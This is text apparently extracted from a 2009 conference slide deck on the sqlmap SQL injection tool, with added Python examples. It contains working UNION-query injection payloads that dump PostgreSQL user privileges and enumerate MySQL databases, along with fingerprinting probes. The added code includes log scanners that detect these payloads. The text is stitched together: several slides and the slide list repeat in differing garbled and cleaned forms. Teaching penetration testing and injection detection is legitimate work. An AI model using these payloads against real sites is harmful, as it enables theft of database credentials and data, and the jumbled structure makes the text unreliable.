The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
More on fingerprint
Fingerprinting is a key step in penetration testing.
It is not only about back-end DBMS software.
There are techniques and tools to fingerprint the web server, the web application technology and their underlying system.
What about the back-end DBMS underlying system?
sqlmap can fingerprint them without making extra requests:
Web application server and web application technology, by parsing the HTTP response headers (Server, X-AspNet-Version, X-Powered-By, etc.) – known technique
Back-end DBMS operating system, by parsing the DBMS banner – over-looked technique
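What a DBMS banner gives away about its host, as an added example written for this page (it is not sqlmap's own code): the banners below are constructed in the shape of PostgreSQL version(), Microsoft SQL Server @@version and MySQL @@version strings, and parse_banner derives DBMS, version and operating system from the text alone, with no extra request. The Windows NT kernel-to-product table is the only mapping included; a build-number-to-service-pack table (the slide's 9.00.1399 = Service Pack 0) is left out. From the defender's side this is the reason version banners and verbose errors should never reach an application's output.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample banners in the shape returned by version() / @@version.
# They are examples written for this page, not output captured from a target.
SAMPLE_BANNERS = {
    "postgresql": "PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1) 4.3.2",
    "mssql": ("Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) \n"
              "\tOct 14 2005 00:33:37 \n"
              "\tCopyright (c) 1988-2005 Microsoft Corporation\n"
              "\tExpress Edition on Windows NT 5.2 (Build 3790: Service Pack 1)"),
    # MySQL @@version carries only a packaging suffix, not the OS (see parse_banner)
    "mysql": "5.0.51a-3ubuntu5.4",
}

@dataclass
class Fingerprint:
    dbms: str
    version: Optional[str]
    os: Optional[str]

# Windows NT kernel versions -> product names (kept deliberately small)
_NT_NAMES = {
    "5.0": "Windows 2000",
    "5.1": "Windows XP",
    "5.2": "Windows Server 2003",
    "6.0": "Windows Vista/Server 2008",
}

def parse_banner(banner: str) -> Fingerprint:
    """Derive DBMS, version and the DBMS host OS from a banner string alone."""
    m = re.match(r"PostgreSQL\s+([\d.]+)\s+on\s+(\S+)", banner)
    if m:
        # The build target triplet (e.g. i486-pc-linux-gnu) names the platform, hence the OS.
        triplet = m.group(2).rstrip(",")
        os_name = "Linux" if "linux" in triplet else triplet
        return Fingerprint("PostgreSQL", m.group(1), os_name)

    m = re.match(r"Microsoft SQL Server\s+(\d{4})\s+-\s+([\d.]+)", banner)
    if m:
        os_name = None
        nt = re.search(r"on Windows NT (\d+\.\d+)\s*\(Build (\d+)(?::\s*Service Pack (\d+))?\)", banner)
        if nt:
            os_name = _NT_NAMES.get(nt.group(1), "Windows NT " + nt.group(1))
            if nt.group(3):
                os_name += " SP" + nt.group(3)
        return Fingerprint("Microsoft SQL Server " + m.group(1), m.group(2), os_name)

    m = re.match(r"(\d+\.\d+\.\d+\w*)(?:-(\S+))?$", banner)
    if m:
        # Only a hint: the distribution suffix of the package is all @@version exposes;
        # @@version_compile_os would be the authoritative source.
        suffix = m.group(2) or ""
        os_hint = "Linux (Debian/Ubuntu package)" if ("ubuntu" in suffix or "deb" in suffix) else None
        return Fingerprint("MySQL", m.group(1), os_hint)

    return Fingerprint("unknown", None, None)

if __name__ == "__main__":
    for name, banner in SAMPLE_BANNERS.items():
        print(name, "->", parse_banner(banner))
```

The regular expressions are anchored to the banner shapes above; a hardened installation that withholds the banner simply yields "unknown", which is the point of the slide's remark that only the SQL dialect and function-output techniques survive hardening.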
Second demo
"A demo, as in demolish or demonstration?" – Cyclops, X-Men Evolution
Give me a SQL shell
It might come in handy sometimes to be able to run your own SQL queries, mainly for file system read and write access and operating system command execution.
The tool inspects the provided statement:
If it is a SELECT statement, sqlmap uses, depending on the user's options, the inferential blind or the UNION query technique to retrieve its output.
If it is a data manipulation statement, a transaction statement or any other valid SQL statement, it uses stacked queries to run it, if the web application supports them.
Automation vs granularity (1/2)
sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications.
Providing it with a source of targets, it can automatically:
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS-specific queries and then manually inject them to enumerate users' password hashes, check if the session user is a DBA, enumerate table columns' data types, etc.
There is an option to dump the whole back-end DBMS.
Automation vs granularity (2/2)
The tester is a professional: he knows what he does and why.
There are options to specify:
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from the command line and/or a configuration file.
Options are documented in the user's manual with examples.
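One way to implement the first of those options, comparing True and False HTTP responses, as an added example that is not sqlmap's code: it uses Python's difflib (listed in the references) with a similarity threshold, and lets the tester strip page regions identified as dynamic, such as a rotating advertisement, before comparing. Without that step a page that differs from the True reference only in an ad counter drops below the threshold and is misclassified, which is the failure the option exists to address. The HTML bodies, the threshold value and the function names are constructed for this example.

```python
import difflib
import re
from typing import Iterable

# Constructed HTML bodies standing in for the responses to a True and a False
# boolean condition injected into a parameter (example data for this page).
TRUE_PAGE = "<html><body><div id='ad'>promo 8813</div><h1>Product 5</h1><p>Widget, in stock</p></body></html>"
FALSE_PAGE = "<html><body><div id='ad'>promo 2090</div><h1>Product</h1><p>No such item</p></body></html>"
# The same True page fetched a second time: only the advertisement counter changed.
TRUE_PAGE_AGAIN = "<html><body><div id='ad'>promo 4417</div><h1>Product 5</h1><p>Widget, in stock</p></body></html>"

# Region the tester has identified as dynamic and wants ignored.
AD_REGIONS = [r"<div id='ad'>.*?</div>"]

def similarity(a: str, b: str) -> float:
    """difflib ratio in [0, 1]; 1.0 means the two bodies are identical."""
    return difflib.SequenceMatcher(None, a, b).ratio()

def strip_dynamic(page: str, patterns: Iterable[str]) -> str:
    """Remove regions matching the given regular expressions (ads, counters, timestamps)."""
    for pat in patterns:
        page = re.sub(pat, "", page, flags=re.S)
    return page

def classify(response: str, true_ref: str, false_ref: str,
             threshold: float = 0.98, dynamic: Iterable[str] = ()) -> bool:
    """True when the response resembles the True reference above the threshold and
    more closely than the False reference. A threshold, not equality, is used because
    two fetches of the same page are rarely byte-identical."""
    dynamic = list(dynamic)
    r, t, f = (strip_dynamic(p, dynamic) for p in (response, true_ref, false_ref))
    r_true = similarity(r, t)
    r_false = similarity(r, f)
    return r_true >= threshold and r_true > r_false

if __name__ == "__main__":
    # Without stripping the ad the second fetch scores about 0.97 and is misclassified.
    print("naive:", classify(TRUE_PAGE_AGAIN, TRUE_PAGE, FALSE_PAGE))
    print("ads stripped:", classify(TRUE_PAGE_AGAIN, TRUE_PAGE, FALSE_PAGE, dynamic=AD_REGIONS))
```

The 0.98 threshold is an assumption chosen for the example; in practice it is the kind of value the slide says the tester should be able to set per target, since the right number depends on how much of the page is boilerplate.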
Third demo
"I get tons of uninteresting mail, and system announcements about babies born, etc. At least a demo MIGHT have been interesting." – Richard Stallman
Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not support:
SQL injection on SQL clauses other than WHERE
Time-based blind SQL injection technique
... but I am working on these and others.
Want to contribute?
I am always looking forward to code contributions.
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists.
I can provide you with:
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in the London area
Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
http://sqlmap.sourceforge.net/dev/index.html
http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
E-mail / Jabber: bernardo.damele@gmail.com
Blog: http://bernardodamele.blogspot.com
References
OWASP Testing Guide, Open Web Application Security Project
Exploit of a Mom, xkcd
Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework, H D Moore and the Metasploit development team
w3af, Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
Python difflib, Python Software Foundation
NULL (SQL), Wikipedia
Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection, Bernardo Damele A G
DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)
Questions?
Thanks for your attention
Bypass columns limitation (1/4)
You have got an injection point.
It is vulnerable to UNION query SQL injection.
sqlmap detected it for you, by NULL bruteforcing or by ORDER BY clause bruteforcing, depending on your options.
Bypass columns limitation (2/4)
Obstacle:
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement.
Bypass columns limitation (3/4)
A possible solution consists in concatenating your SELECT statement columns into a single output, by using the specific DBMS string concatenation operator or function.
Example on PostgreSQL 8.3 to retrieve users' privileges.
The SQL query to inject is:
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
Bypass columns limitation (4/4)
The injection will be:
UNION ALL SELECT NULL, CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)), CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102), NULL FROM pg_user--
Going partial UNION (1/3)
Obstacle:
You have got an injection point vulnerable to UNION query SQL injection. Only the query output's first entry, or a range of entries, is displayed in the page content.
Going partial UNION (2/3)
sqlmap automates a known technique:
Changes the parameter value to its negative value, causing the original query to produce no output
Inspects and unpacks the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeats the previous action N times, where N is equal to the number of entries
Going partial UNION (3/3)
Example on MySQL 4.1 to enumerate the list of databases.
The SQL query to inject is:
SELECT db FROM mysql.db
sqlmap identified the injection point as being a non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario).
The injection will be:
id=-1 UNION ALL SELECT NULL, CONCAT(CHAR(100,84,71,69,87,98), IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,81,87,116)), NULL FROM mysql.db LIMIT 0, 1 AND 6972=6972
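The two injections on the "Bypass columns limitation (4/4)" and "Going partial UNION (3/3)" slides share one structure: each column's value is wrapped in marker strings built character by character with CHR()||CHR() or CHAR(n,n,...), so the tool can locate the output in the page, and COALESCE/IFNULL turn a NULL column into a space so the concatenation does not collapse to NULL. From the defender's side those same constructs are what to look for in web-server logs. The following Python block is an added example written for this page (it is not sqlmap code): it scans constructed access-log lines carrying the slides' two payload shapes, decodes the marker strings (the PostgreSQL payload's CHR chains decode to SrlGVt and KyPADf, the MySQL payload's CHAR lists to dTGEWb and ASvQWt), tells the PostgreSQL-style concatenation from the MySQL-style one, and flags the LIMIT clause and negated parameter that characterise the partial-UNION technique. The log lines, the client address and the paths are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed access-log lines (not captured traffic). The query strings carry the
# two payload shapes shown on the slides, URL-encoded as a client would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jan/2009:10:00:01 +0000] "GET /item.php?id=5 HTTP/1.1" 200 1843',
    '10.0.0.5 - - [09/Jan/2009:10:00:02 +0000] "GET /item.php?id=-1%20UNION%20ALL%20SELECT%20NULL,%20'
    'CONCAT(CHAR(100,84,71,69,87,98),IFNULL(CAST(db%20AS%20CHAR(10000)),%20CHAR(32)),%20'
    'CHAR(65,83,118,81,87,116)),%20NULL%20FROM%20mysql.db%20LIMIT%200,%201%20AND%206972=6972 HTTP/1.1" 200 1902',
    '10.0.0.5 - - [09/Jan/2009:10:00:03 +0000] "GET /user.php?id=1%20UNION%20ALL%20SELECT%20NULL,%20'
    'CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename%20AS%20CHARACTER(10000)),%20CHR(32))'
    '||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102),%20NULL%20FROM%20pg_user-- HTTP/1.1" 200 2210',
]

LOG_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)
CHR_RUN_RE = re.compile(r"(?:CHR\(\d+\)(?:\|\|)?)+", re.I)       # CHR(83)||CHR(114)||...
CHAR_LIST_RE = re.compile(r"CHAR\(((?:\d+\s*,\s*)+\d+)\)", re.I)   # CHAR(100,84,...), needs a comma
LIMIT_RE = re.compile(r"\bLIMIT\s+\d+\s*,\s*\d+", re.I)

def decode_markers(sql: str) -> List[str]:
    """Turn every CHR(n)||CHR(n)... run and CHAR(n,n,...) list back into the literal it builds.
    Single characters (CHR(32) padding) and non-printable codes (CHAR(10000) is a length) are dropped."""
    code_lists: List[List[int]] = []
    for run in CHR_RUN_RE.findall(sql):
        code_lists.append([int(c) for c in re.findall(r"CHR\((\d+)\)", run, re.I)])
    for csv in CHAR_LIST_RE.findall(sql):
        code_lists.append([int(c) for c in csv.split(",")])
    return ["".join(chr(c) for c in codes)
            for codes in code_lists
            if len(codes) >= 2 and all(32 <= c <= 126 for c in codes)]

def analyse_request(line: str) -> Optional[Dict[str, object]]:
    """Return traits of a UNION-based payload found in one log line, or None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    url = unquote_plus(m.group(1))
    path, _, query = url.partition("?")
    if not UNION_RE.search(query):
        return None
    if re.search(r"CHR\(\d+\)\s*\|\|", query, re.I):
        dialect = "PostgreSQL-style (CHR() joined with ||)"
    elif re.search(r"CONCAT\(", query, re.I) and re.search(r"CHAR\(\d+\s*,", query, re.I):
        dialect = "MySQL-style (CONCAT with CHAR(n,n,...))"
    else:
        dialect = "unknown"
    return {
        "path": path,
        "dialect": dialect,
        "markers": decode_markers(query),
        # LIMIT x, 1 after the UNION: one entry per request, the partial-UNION trait
        "row_by_row": bool(LIMIT_RE.search(query)),
        # negated integer parameter so the original query returns nothing
        "original_query_nulled": bool(re.search(r"=-\d+\s", query)),
        "comment_terminated": query.rstrip().endswith("--"),
    }

def scan_log(lines: List[str]) -> List[Tuple[str, Dict[str, object]]]:
    """Pair each flagged request with the client address from the log line."""
    findings = []
    for line in lines:
        result = analyse_request(line)
        if result is not None:
            findings.append((line.split()[0], result))
    return findings

if __name__ == "__main__":
    for client, finding in scan_log(SAMPLE_LOG):
        print(client, finding)
```

The decoded markers are the most useful field for triage: they are random per session, so the same marker recurring across many requests ties them to one run of a tool, while LIMIT counting upward one request at a time is the signature of the row-by-row retrieval described on the slide.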
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London – January 9 2009 – slide 25
Bypass columns limitation (4/4)
The injection will be:
UNION ALL SELECT NULL, CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)), CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102), NULL FROM pg_user--
Intercon III London – January 9 2009 – slide 26
Going partial UNION (1/3)
Obstacle:
You have got an injection point vulnerable to UNION query SQL injection. Only the query output's first entry, or a range of entries, is displayed in the page content.
Intercon III London – January 9 2009 – slide 27
Going partial UNION (2/3)
sqlmap automates a known technique:
- Changes the parameter value to its negative value, causing the original query to produce no output
- Inspects and unpacks the provided SQL statement
- Calculates the number of entries in its output
- Limits it after the UNION ALL SELECT to return one entry at a time
- Repeats the previous action N times, where N is equal to the number of entries
Intercon III London – January 9 2009 – slide 28
Going partial UNION (3/3)
Example on MySQL 4.1 to enumerate the list of databases.
The SQL query to inject is:
SELECT db FROM mysql.db
sqlmap identified the injection point as a non-quoted (integer) parameter in the WHERE clause with the equal operator (simple scenario).
The injection will be:
id=-1 UNION ALL SELECT NULL, CONCAT(CHAR(100,84,71,69,87,98), IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,81,87,116)), NULL FROM mysql.db LIMIT 0, 1 AND 6972=6972
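As an added example (not part of the slides and not sqlmap code), the detection side of the payload shapes shown on the last few slides: a scanner over access log lines that URL-decodes each request and flags the combined traits of a partial UNION injection (negated integer parameter, UNION ALL SELECT with NULL placeholders, CHAR()/CHR() encoded delimiters, LIMIT n,1 pagination, comment tail, numeric tautology). The log lines, rule names and threshold are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Combined Log Format line (the constructed sample lines below follow it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Traits of the UNION query payloads discussed on the slides. Each rule is a
# (name, regex) pair applied to the URL-decoded request; a request is reported
# only when it matches at least MIN_HITS of them, so a lone keyword is not enough.
RULES = [
    ("union_select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("null_columns", re.compile(r"\bSELECT\s+NULL\b|,\s*NULL\b", re.I)),
    # negated integer parameter so that the original query returns no rows
    ("negated_int_param", re.compile(r"[?&]\w+=-\d+\s+UNION\b", re.I)),
    # CHAR(1,2,3) lists (MySQL) or CHR(n)||CHR(n) chains (PostgreSQL)
    ("char_encoded_delim", re.compile(
        r"\bCHAR\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)|(?:CHR\s*\(\d+\)\s*\|\|\s*){2,}", re.I)),
    # LIMIT n,1 one-row-at-a-time pagination of the partial UNION technique
    ("limit_pagination", re.compile(r"\bLIMIT\s+\d+\s*,\s*1\b", re.I)),
    ("comment_tail", re.compile(r"--\s*$|#\s*$|/\*")),
    ("numeric_tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
]
MIN_HITS = 2


def decode_request(path, max_rounds=3):
    """URL-decode repeatedly (double encoding is common) until the value is stable."""
    current = path
    for _ in range(max_rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def score_request(path):
    """Return (decoded_request, [names of matching rules])."""
    decoded = decode_request(path)
    hits = [name for name, rx in RULES if rx.search(decoded)]
    return decoded, hits


def scan_log(lines, min_hits=MIN_HITS):
    """Parse log lines and return findings for requests matching >= min_hits rules."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line we understand; skip rather than guess
        decoded, hits = score_request(m.group("path"))
        if len(hits) >= min_hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "decoded": decoded, "hits": hits})
    return findings


# Constructed sample log: a benign request, the MySQL partial UNION payload shape
# from the slides, a PostgreSQL CHR() chain, a benign search that merely contains
# the words "union" and "select", and a double-encoded payload.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jan/2009:10:00:01 +0000] "GET /news.php?id=7 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [09/Jan/2009:10:00:02 +0000] "GET /news.php?id=-1%20UNION%20ALL%20SELECT'
    '%20NULL%2C%20CONCAT%28CHAR%28100%2C84%2C71%2C69%2C87%2C98%29%2CIFNULL%28CAST%28db%20AS'
    '%20CHAR%2810000%29%29%2CCHAR%2832%29%29%2CCHAR%2865%2C83%2C118%2C81%2C87%2C116%29%29'
    '%2C%20NULL%20FROM%20mysql.db%20LIMIT%200%2C%201%20AND%206972%3D6972 HTTP/1.1" 200 5230',
    '198.51.100.7 - - [09/Jan/2009:10:00:03 +0000] "GET /users.php?id=-1%20UNION%20ALL%20SELECT'
    '%20NULL%2C%20CHR%2883%29%7C%7CCHR%28114%29%7C%7CCOALESCE%28CAST%28usename%20AS'
    '%20CHARACTER%2810000%29%29%2C%20CHR%2832%29%29%2C%20NULL%20FROM%20pg_user-- HTTP/1.1" 500 311',
    '203.0.113.5 - - [09/Jan/2009:10:00:04 +0000] "GET /search.php?q=union+station+select+bus HTTP/1.1" 200 8801',
    '192.0.2.10 - - [09/Jan/2009:10:00:05 +0000] "GET /news.php?id=-1%2520UNION%2520ALL%2520SELECT'
    '%2520NULL%252CNULL%2520FROM%2520mysql.db%2520LIMIT%25201%252C1-- HTTP/1.1" 200 5230',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["ts"], ", ".join(finding["hits"]))
        print("   ", finding["decoded"])
```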
Intercon III London – January 9 2009 – slide 29
DBMS fingerprint (1/4)
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw.
There are a few well known techniques and a few over-looked techniques.
sqlmap implements up to four techniques; three of these are in use by other tools.
- The user can force the back-end DBMS software value: no HTTP requests are sent to identify the software
- By default a basic DBMS fingerprint based on one or two techniques is done: only two HTTP requests are sent
- The user can choose to perform an extensive DBMS fingerprint based on four techniques: numerous (30+) HTTP requests are sent
Intercon III London – January 9 2009 – slide 30
DBMS fingerprint (2/4)
The techniques implemented to perform an extensive back-end DBMS fingerprint are:
- Inband error messages
- Banner parsing
- SQL dialect
- Specific functions' static output comparison
On a default installation all of them are reliable.
On a hardened installation the last two are reliable.
Intercon III London – January 9 2009 – slide 31
DBMS fingerprint (3/4)
Example of basic back-end DBMS fingerprint on PostgreSQL 8.3.
The techniques in use are two.
